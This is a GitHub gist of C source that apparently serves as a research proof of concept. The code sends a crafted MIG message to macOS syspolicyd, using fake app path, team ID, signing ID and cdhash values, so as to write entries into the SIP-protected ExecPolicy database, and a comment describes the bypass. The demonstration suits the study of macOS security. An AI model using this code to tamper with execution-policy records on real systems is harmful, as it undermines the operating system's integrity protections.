Skip to content

Instantly share code, notes, and snippets.

@knightsc knightsc/aspmig.c
Created Feb 14, 2019

Embed
What would you like to do?
Example of sedning notify_32bit_exec MIG message to syspolicyd
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <mach/mach.h>
/*
This allows you to write to /var/db/SystemPolicyConfiguration/ExecPolicy
even with SIP on. Basically before syspolicyd determines if the values
you pass can be checked or not it will save them to the ExecPolicy
database.
There are still errors when passing in a real application.
default 08:22:28.588787 -0500 trustd asynchronously fetching CRL (http://crl.apple.com/root.crl) for client (syspolicyd[1977]/0#-1 LF=0)
default 08:22:28.617267 -0500 syspolicyd -[LSCodeEvaluationClientManager handlePromptResponse:info:identifier:]: response: 2 info: <private>
error 08:22:28.617885 -0500 syspolicyd failed to call driver: 0x3
*/
struct message {
mach_msg_header_t hdr;
uint32_t u1;
uint32_t u2;
uint32_t eval_id;
uint32_t u3;
uid_t uid;
pid_t pid;
uint32_t u4;
uint32_t path_size;
char path[1024];
uint32_t u5;
uint32_t team_id_size;
char team_id[64];
uint32_t u6;
uint32_t signing_id_size;
char signing_id[128];
char cdhash[20];
};
int
main(int argc, char *argv[])
{
kern_return_t kr;
mach_port_t host;
mach_port_t host_priv;
mach_port_t asp_port;
struct message msg;
host = mach_host_self();
kr = host_get_host_priv_port(host, &host_priv);
if (kr != KERN_SUCCESS) {
printf("Error getting host_priv port\n");
exit(1);
}
kr = host_get_special_port(host_priv, HOST_LOCAL_NODE, HOST_SYSPOLICYD_PORT, &asp_port);
if (kr != KERN_SUCCESS) {
printf("Error getting syspolicyd mig port\n");
exit(1);
}
msg.hdr.msgh_bits = MACH_MSGH_BITS_REMOTE(MACH_MSG_TYPE_MOVE_SEND);
msg.hdr.msgh_size = sizeof(msg);
msg.hdr.msgh_remote_port = asp_port;
msg.hdr.msgh_local_port = MACH_PORT_NULL;
msg.hdr.msgh_voucher_port = MACH_PORT_NULL;
msg.hdr.msgh_id = 0x48a8;
msg.u1 = 0;
msg.u2 = 1;
msg.eval_id = 2;
msg.u3 = 0;
msg.uid = 502;
msg.pid = 1;
msg.u4 = 0;
msg.path_size = 1024;
memset(msg.path, 0, msg.path_size);
strncpy(msg.path, "/Applications/FakeApp.app", msg.path_size);
msg.u5 = 0;
msg.team_id_size = 64;
memset(msg.team_id, 0, msg.team_id_size);
strncpy(msg.team_id, "ABCDEFGHIJ", msg.team_id_size);
msg.u6 = 0;
msg.signing_id_size = 128;
memset(msg.signing_id, 0, msg.signing_id_size);
strncpy(msg.signing_id, "com.fake.bundle.Id", msg.signing_id_size);
strncpy(msg.cdhash, "\xd7\x4a\x6b\x33\x0a\x8c\x67\xc4\x8f\xc0\xf8\xbb\xc7\xe0\xdc\x46\x55\xe2\x44\xb8", 20);
kr = mach_msg(
&msg.hdr,
MACH_SEND_MSG,
sizeof(msg),
0,
MACH_PORT_NULL,
MACH_MSG_TIMEOUT_NONE,
MACH_PORT_NULL
);
if (kr != KERN_SUCCESS) {
printf("Error sending mach msg\n");
exit(1);
}
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.